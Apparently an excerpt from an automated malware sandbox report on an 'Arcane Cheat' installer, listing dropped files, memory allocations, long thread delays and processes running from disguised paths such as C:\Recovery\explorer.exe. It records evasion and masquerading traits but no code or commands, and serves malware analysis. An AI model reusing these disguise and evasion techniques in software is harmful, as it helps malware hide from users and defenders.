            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeMemory allocated: 1AAB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\addins\audiodg.exeMemory allocated: 3050000 memory reserve | memory write watch
            Source: C:\Windows\addins\audiodg.exeMemory allocated: 1B260000 memory reserve | memory write watch
            Source: C:\Windows\addins\audiodg.exeMemory allocated: 7B0000 memory reserve | memory write watch
            Source: C:\Windows\addins\audiodg.exeMemory allocated: 1A4F0000 memory reserve | memory write watch
            Source: C:\Recovery\explorer.exeMemory allocated: 1090000 memory reserve | memory write watch
            Source: C:\Recovery\explorer.exeMemory allocated: 1A9E0000 memory reserve | memory write watch
            Source: C:\Recovery\explorer.exeMemory allocated: C90000 memory reserve | memory write watch
            Source: C:\Recovery\explorer.exeMemory allocated: 1A8D0000 memory reserve | memory write watch
            Source: C:\Recovery\explorer.exeCode function: 40_2_00007FFD9BA90525 sldt word ptr [eax]40_2_00007FFD9BA90525
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\addins\audiodg.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWindow / User API: threadDelayed 1195Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWindow / User API: threadDelayed 997Jump to behavior
            Source: C:\Windows\addins\audiodg.exeWindow / User API: threadDelayed 367
            Source: C:\Recovery\explorer.exeWindow / User API: threadDelayed 365
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1750
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1810
            Source: C:\Recovery\explorer.exeWindow / User API: threadDelayed 367
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1788
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1967
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1804
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\verify.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DQ2M9.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KH7DR.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-VNH60.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M0CO5.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-9OG1R.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-CKDJ7.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-B9PAS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsdt.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-GMKU6.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7KMRP.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-HUQAI.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MH2RS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7HO40.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6IE0O.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-4VJ8E.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jaas_nt.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dcpr.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jabswitch.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\management.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1EODK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\fontmanager.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfr.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KP5B8.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\hprof.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\keytool.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MITQ2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\awt.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jawt.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-G6G2A.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FKC0I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\nio.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DLMB6.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\j2pkcs11.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-I5RLV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\eula.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KL3UV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\wsdetect.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\npjp2.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\splashscreen.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-17AF0.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\orbd.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-LUGNS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\j2pcsc.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\instrument.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge-32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\is-L2DJE.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-U0SIJ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-TH2Q9.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-5VJPG.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcp120.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\klist.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-SGAAD.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\glib-lite.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2native.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\java.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-P9144.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-OV1CO.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-ML2GN.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\net.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_common.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-AASG5.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-VI3JJ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javacpl.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\gstreamer-lite.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\mlib_image.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-QS1JT.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javacpl.cpl (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-78EDT.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\pack200.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DCG3E.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N4812.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_sw.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\sunmscapi.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\ktab.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-9PR86.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M6OGV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F8M96.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\client\is-KHA4M.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-94OVM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\bci.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-O5MSC.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F39U2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_socket.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-0TC1S.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\tnameserv.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\policytool.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\glass.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1NNTS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\w2k_lsa_auth.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FLHTG.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-D49GQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RJ8O6.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6TBSI.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\lcms.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jpeg.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-3CGHC.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-G1B5Q.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\zip.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\client\jvm.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-C92NJ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-S4T07.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\sunec.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-B9B0I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\java-rmi.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\kinit.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\unpack.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\decora_sse.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-23BHM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DK2B0.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-8BCTR.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jdwp.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-LS3UA.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\java.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsoundds.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javaw.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfxwebkit.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-OMDGH.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javaws.exe (copy)Jump to dropped file
